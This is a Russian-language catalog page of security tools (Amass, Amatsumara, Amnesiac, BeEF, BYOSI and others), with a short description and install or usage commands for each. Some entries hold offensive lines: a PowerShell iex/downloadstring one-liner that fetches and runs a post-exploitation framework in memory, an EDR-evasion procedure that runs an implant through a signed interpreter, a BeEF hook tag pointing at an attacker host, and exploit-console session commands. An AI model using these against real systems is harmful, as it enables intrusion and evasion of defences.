Каталог инструментов

454 инструментов

Amass

v5.1.1
Reconnaissance

Глубокая разведка DNS и отображение поверхности атаки. Проект OWASP. Использует более 50 пассивных источников: сертификатные логи (crt.sh), DNS брутфорс, reverse DNS, API (Shodan, Censys, VirusTotal, Chaos, и др.), …

# Go install go install -v github.com/owasp-amass/amass/v4/...@master # Apt (Kali) apt install amass # Snap snap install amass # Docker docker pull caffix/amass docker run caffix/amass enum -d example.com
Блог

Amatsumara

v2.9.1
Exploitation

Фреймворк для пентестинга на Rust с динамической загрузкой модулей через C FFI. Модули — нативные `.so`-библиотеки: добавить новую возможность = скопировать файл в директорию модулей. Содержит 8 exploit-модулей, …

# Требования: Rust 1.70+, Linux x86_64 git clone https://codeberg.org/lorsupra/Amatsumara.git cd Amatsumara cargo build --release # Запуск консоли ./target/release/amatsumara-console # Основные команды REPL: # search <term> -- поиск модулей (по имени, типу, CVE) # search cve:CVE-2024-45337 -- поиск по CVE # use exploit/module-slug -- загрузить модуль # set LHOST 192.168.1.100 -- установить опцию (auto-detect tun0/tap0) # set LPORT 4444 # run -- выполнить # run -j -- в фоне (background job) # sessions -- список сессий # sessions -i 1 -- interact с сессией #1 # Экспорт каталога модулей (JSON) ./target/release/amatsumara-console --list-modules --json | jq '.[].slug'

Amnesiac

Exploitation

PowerShell post-exploitation фреймворк, ориентированный на in-memory выполнение для поддержки латерального перемещения и оценки обстановки в средах Active Directory.

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/Leo4j/Amnesiac/main/Amnesiac.ps1');Amnesiac iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/Leo4j/Amnesiac/refs/heads/main/Amnesiac_ShellReady.ps1');Amnesiac

AmneziaWG

v0.2.19
Anonymizers ★ featured

Форк WireGuard с защитой от определения протокола DPI-системами. Оригинальный WireGuard легко детектируется и блокируется (уникальные заголовки UDP-пакетов). AmneziaWG добавляет: динамические заголовки из случайных диапазонов, рандомизированные размеры пакетов, маскировку …

# Ядро (Linux kernel module) apt install amneziawg-dkms # Go-реализация (userspace) go install github.com/amnezia-vpn/amneziawg-go@latest # Установщик сервера (Debian/Ubuntu) bash <(curl -fsSL https://raw.githubusercontent.com/bivlked/amneziawg-installer/main/install.sh) # Конфиг — пример с обфускацией # [Interface] # Jc = 4 # Jmin = 40 # Jmax = 70 # S1 = 0 # S2 = 0

Anonsurf

v1.4.0.0
Anonymizers

Инструмент от Parrot OS для полной системной анонимности: одной командой заворачивает весь трафик ОС через Tor с помощью iptables. Автоматически убивает опасные процессы (clearnet-соединения), меняет hostname и MAC, …

# Parrot OS — предустановлен # На других Debian-дистрибутивах: git clone https://github.com/Und3rf10w/kali-anonsurf cd kali-anonsurf && bash installer.sh # Использование anonsurf start anonsurf myip # проверить текущий IP anonsurf changeid # сменить цепочку Tor anonsurf stop

Argus

v5.0.2
Network Analysis

Audit Record Generation and Utilization System — двунаправленная система учёта сетевых потоков: sensor генерирует бинарные flow-записи, пакет argus-clients содержит 30+ утилит для фильтрации, агрегации и визуализации данных.

# Kali / Debian / Ubuntu sudo apt install argus-server argus-client # Из исходников git clone https://github.com/openargus/argus cd argus && ./configure && make && sudo make install git clone https://github.com/openargus/clients cd clients && ./configure && make && sudo make install # Захват трафика (сервер) sudo argus -i eth0 -w argus.out # Анализ (клиент) ra -r argus.out -s srcid stime dur proto src dst pkts bytes

Arkime

v6.5.0
Network Analysis

Масштабируемая система с открытым исходным кодом для индексации и анализа сетевого трафика. Идеальна для полноценного анализа трафика в корпоративных сетях.

Полная инструкция https://arkime.com/install Краткая(для локального анализа(Debian-only)) Устанавливаем elasticsearch wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo gpg --dearmor -o /usr/share/keyrings/elasticsearch-keyring.gpg sudo apt-get install apt-transport-https echo "deb [signed-by=/usr/share/keyrings/elasticsearch-keyring.gpg] https://artifacts.elastic.co/packages/9.x/apt stable main" | sudo tee /etc/apt/sources.list.d/elastic-9.x.list sudo apt-get update && sudo apt-get install elasticsearch systemctl enable --now elasticsearch nano /etc/elasticsearch/elasticsearch.yml network.host: 0.0.0.0 export ve="5.8.2-1"; arch="$(dpkg-architecture -q DEB_HOST_ARCH)"; curl -OL https://github.com/arkime/arkime/releases/download/v"${ve::-2}"/arkime_"${ve}".debian12_"${arch}".deb apt install ./arkime-*.deb /opt/arkime/db/db.pl --esuser admin https://localhost:9200 init --ilm /opt/arkime/db/db.pl --esuser admin https://localhost:9200 ilm 1d 30d /opt/arkime/bin/Configure /opt/arkime/bin/arkime_add_user.sh admin "Admin User" changeme --admin systemctl enable --now arkimecapture systemctl enable --now arkimeviewer sleep 1 tail /opt/arkime/logs/*.log curl -u admin:changeme --digest http://localhost:8005/eshealth.json Дополнительно. Конфигурация cont3xt /opt/arkime/bin/Configure --cont3xt #### OpenSearch/Elasticsearch URL: https://localhost:9200 #### OpenSearch/Elasticsearch User: admin #### OpenSearch/Elasticsearch Password: PleaseChangeM3! #### Password: A new password, not the ES password # Initialize the database if not done previously, use the password from OpenSearch/Elasticsearch!!! /opt/arkime/db/db.pl --esuser admin https://localhost:9200 init /opt/arkime/bin/arkime_add_user.sh admin "Admin User" changeme --admin systemctl enable --now arkimecont3xt sleep 1 tail /opt/arkime/logs/cont3xt.log

AutoMalDesc

Malware Analysis & Forensics

LLM-фреймворк для автоматической классификации и описания поведения вредоносных скриптов на пяти языках.

uv venv --python 3.12 source .venv/bin/activate uv pip install -e . uv pip install 'flash-attn==2.8.3' --no-build-isolation

Autopsy

Network Analysis

Цифровая форензика: GUI-платформа на базе The Sleuth Kit для анализа дисков и образов. Восстановление удалённых файлов, временная шкала событий, анализ веб-активности, поиск по ключевым словам, геолокация, хеш-базы NSRL. …

# Ubuntu/Debian (Autopsy 2 — CLI/web-интерфейс): sudo apt install autopsy sleuthkit autopsy # Открыть браузер: http://localhost:9999/autopsy # Autopsy 4.x (GUI, рекомендуется): # 1. Скачать .zip с https://www.autopsy.com/download/ # 2. Распаковать: unzip autopsy-*.zip cd autopsy-*/ ./bin/autopsy # Windows: .msi-установщик с официального сайта # Java 17 должна быть установлена

BBOT

v3.0.0
Reconnaissance

Рекурсивный OSINT-сканер для разведки attack surface от Black Lantern Security. 100+ модулей: поддомены (dnsx, amass, subfinder), сканирование портов, web-crawling, технологический стек, email-адреса, утечки паролей, интеграция с Shodan/SecurityTrails/VirusTotal. Строит …

pip install bbot # Перечисление поддоменов bbot -t example.com -p subdomain-enum # Web-разведка bbot -t example.com -p web # Максимально полный скан bbot -t example.com -p kitchen-sink -o /tmp/results

BYOSI

Post-Exploitation

Обход EDR через использование легитимных подписанных интерпретаторов скриптов вместо бинарных полезных нагрузок.

Clone the repository and run via PowerShell on a Windows target: git clone https://github.com/oldkingcone/BYOSI.git cd BYOSI powershell -ExecutionPolicy Bypass -File byosi.ps1 The script downloads PHP for Windows, extracts it, fetches the implant (poc.php), and executes it via the whitelisted PHP binary.

BeEF

v0.6.0.0
Exploitation

Browser Exploitation Framework — фреймворк для атак через XSS-хук на браузер. После внедрения JS-агента: сбор информации, атаки на внутреннюю сеть, социальная инженерия в браузере, эксплуатация расширений. 300+ модулей …

# Kali Linux (предустановлен): sudo beef-xss # Из исходников: git clone https://github.com/beefproject/beef cd beef bundle install sudo ./beef # Интерфейс: http://127.0.0.1:3000/ui/panel # Хук: <script src="http://yourip:3000/hook.js"></script>